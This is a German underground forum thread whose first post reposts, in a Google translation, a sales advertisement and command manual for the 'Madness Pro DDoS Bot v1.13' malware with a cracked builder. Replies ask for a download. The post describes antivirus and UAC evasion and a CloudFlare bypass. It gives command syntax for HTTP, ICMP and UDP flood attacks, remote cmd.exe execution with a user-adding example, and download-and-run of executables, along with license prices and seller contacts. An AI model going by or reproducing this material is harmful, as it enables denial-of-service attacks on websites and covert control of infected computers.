3 Antworten in diesem Thema

[PaulaAbdul]

Madness Pro DDoS Bot v1.13

Madness Pro DDoS Bot v1.13 Builder cracked by NoNh

Translated by google


History :

In the summer of 2012 we started thinking about creating a fundamentally new DDoS
bot to test their own web resources on the fault-tolerance, since none of the systems
tested did not deserve to even estimate "4".

The test samples during devoured memory load on the CPU local machine flew with
errors, freezes on 50 % capacity CPU, making wrong entries in the registry , causing
activation of protective systems , many weighty error was found in the control panels.
To create your own system, we have studied in detail : BlackEnergy ( source code ),
gbot ( disassembling ), DirtJumper ( disassembling ), Darkness Optima ( source code,
purchased under the contract ), iBot ( source code , purchased under the contract ),
w3Bot ( source) , were also studied the source code of Zeus and many other programs.


- Written in C + +, easily crypt is lightweight (compressed sample < 15KB )
- Full compatibility with all Windows family of NT (x86 and x64)
- Boat has 7 types of attacks
- Stability in the system. Indicators load on the CPU and RAM are very uniform .
- Do not attracted the attention of UAC and Windows Firewall
- Able to establish port, referal and cookies individually for each goal
- Supports up to 10 targets simultaneously
- Has a very low load on the CPU with the new , complex system of parsing commands
(all analogs parsing takes place inside a function in multiple threads - it's extra work
load on the processor . New bot enters all data in the array before the attack on the
function and come ready options address, port , referral , etc.)
- Has an enormous power output of more than 1500 http ( and more 30000 UDP)
queries per minute through direct interaction with the network drivers , even on
desktop Windows! (only using WinSock) is about 10 times more than some few
analogs and more top ( on this parameter ) competitors.
- In the control panel are : the number of requests per minute , right in the system,
the version of the system.
- Supports bypass CloudFlare protection ( !) And many other more common.
- Supports Slow GET and Slow POST modes !
- In the packet header specifies disabling the cache (Cache-Control: no-cache),
which increases the load on the server .
- The protection of dialogue bot panel spetsklyuchem

Detection:
checking build (without crypt and packaging ), only 3 out of all the anti-virus gave a
suspicion (AVIRA, ClamAV, VBA32). During the test key local AV : Kaspersky, Nod32,
DrWeb, Avast missed a file in 100 % of cases.

Modes of attack and the team
Since the system is a professional syntax commands that look like Darkness.

dd1 basic mode of operation via HTTP protocol using GET, using sokkety.
Supports *** cookies and $ $ $ ref and allows for up to 10 targets simultaneously (separated by " ;").
The fastest search volume attack.
Example : dd1 =

Please Login HERE or Register HERE to see this link!

*** cookies $ $ $ referal;

Please Login HERE or Register HERE to see this link!

*** cookies2 $ $ $ referal2

dd2 same treatment as dd1, only the method POST.
Added optional parameter @ @ @ post_data.
It is also support for up to 10 targets.
Example : dd2 =

Please Login HERE or Register HERE to see this link!

*** cookies $ $ $ referal @ @ @ login = yyy & password = hhh

dd3 attack on the HTTP GET method using a system library WinInet.dll.
Good old attack that is used in many Delphi bots .
Slow due to the limitations of Microsoft Windows.
Does not support referral and cookies , supports up to 10 targets.
Example : dd3 =

Please Login HERE or Register HERE to see this link!

dd4 attack via HTTP POST method using the system library WinInet. Same as dd3, only POST. Example:
dd4 =

Please Login HERE or Register HERE to see this link!

@ @ @ @ @ @ login = yyy & password = hhh

dd5 ICMP attack ( pings ) . Supports up to 10 targets.
Example dd5 = 198.168.0.1; 199.0.0.1

dd6 UDP attack . Supports up to 10 targets . Required parameters : port , and text.
Example : dd6 = 192.168.0.2:27015 @ @ @ flud_text

dd7 attack on the HTTP GET method using a system library URMON.dll
Average speed attack that supports up to 10 targets and do not support cookies and referal

cfa command to bypass the protection CloudFlare (!). ONLY used during dd7.
Not ostavnavlivaet the command dd7.
The point is simple
The bot executes java script gets the desired cookie and believes CloudFlare requests made by authorized dd7.
Example : dd7 =

Please Login HERE or Register HERE to see this link!

, then (after fifteen minutes ) cfa =

Please Login HERE or Register HERE to see this link!

cmd command is executed on the command interpreter cmd.exe on the local machine.
Does not stop the execution of other commands.
Example : cmd = net user goodwin / add

exe command to load and run the EXE file.
Does not stop the execution of other commands.
The file is saved under the same name, under which he had been on the internet.
Made three attempts to download the file.
Example : exe =

Please Login HERE or Register HERE to see this link!

Control Panel :
We used a 70% modified of another product (purchased under a contract for change and resale ) by rewriting it almost completely,
as it was found too many mistakes and did not like the code . Of course everything was corrected and optimized - New PU Enjoy !

Prices:
- Test License $ 0 ( only for checking the forums and testers. Updates are not provided )
- Basic License $ 500 (upgrade / Rebuild $ 50 upgrade to the new version $ 100 , the price of modules will be installed later)
- $ 950 full license ( all upgrades, rebuilds and modules are free)


Protection bypass CloudFlare.

CloudFlare security complex is based on the determination of the browser by running Java script in it,
after which the client is issued a unique cookies.
Both, like the browser can theoretically run Java Script . The great difficulty is to fit the required amount
of mathematical functions in the modest size of the build bot , however, some instances of coping with the task !
Consider the example of a test server

Please Login HERE or Register HERE to see this link!

, protected by CloudFlare complex + + Madness 1.08:
1) A botnet command is given dd7 =

Please Login HERE or Register HERE to see this link!

, then start rekvest to the server using the system library UrlMon.
As can be seen on the server logs and sniffer , 302 bots error is returned , which means job security .

2) A botnet command is given cga =

Please Login HERE or Register HERE to see this link!

cookies and bots request for authorization.
Java script executing each bot has a unique (for its ip and useragent) cookie which immediately includes the packet header.
According to the logs can be seen that the requests to the server are in normal mode and returns the content of the website corresponds to the content on it!

Q) Why can not I do it automatically?
A) Depending on the security settings, cookie can be changed in an arbitrary interval and authorization need to go again.
So far, the automation can not cope with it as it makes a person a professional . Too frequent inspection interval greatly
reduces the usability of the site , as ordinary users see every single swing CloudFlare seconds.

Q) Can I use this method all the time, for any purpose ?
A) It is possible, but not recommended. Since dd7 itself is a slow attack , compared with dd1, and then there's the load is
increased due to the preparation of the special package to bypass the protection .

News of the project
From today, we are working with another Celler Sales: iSupport (709186)

ICQ: 902300, 903400, 709186
JAB: damrai13@jabber.ru

Note : incconfig.php has to be writeable
Note 2 : Panel is modded Darkness (Optima) by myself (no RU language), if you have original one for madness please send it over ...

[funstyler]

Kommt auch ein Download für Normalos ?

[xion]

Ich schließe mich der Frage an. Mich hätte ein DL-Link auch sehr interessiert.

[predator]

Kommt auch ein Download für Normalos ?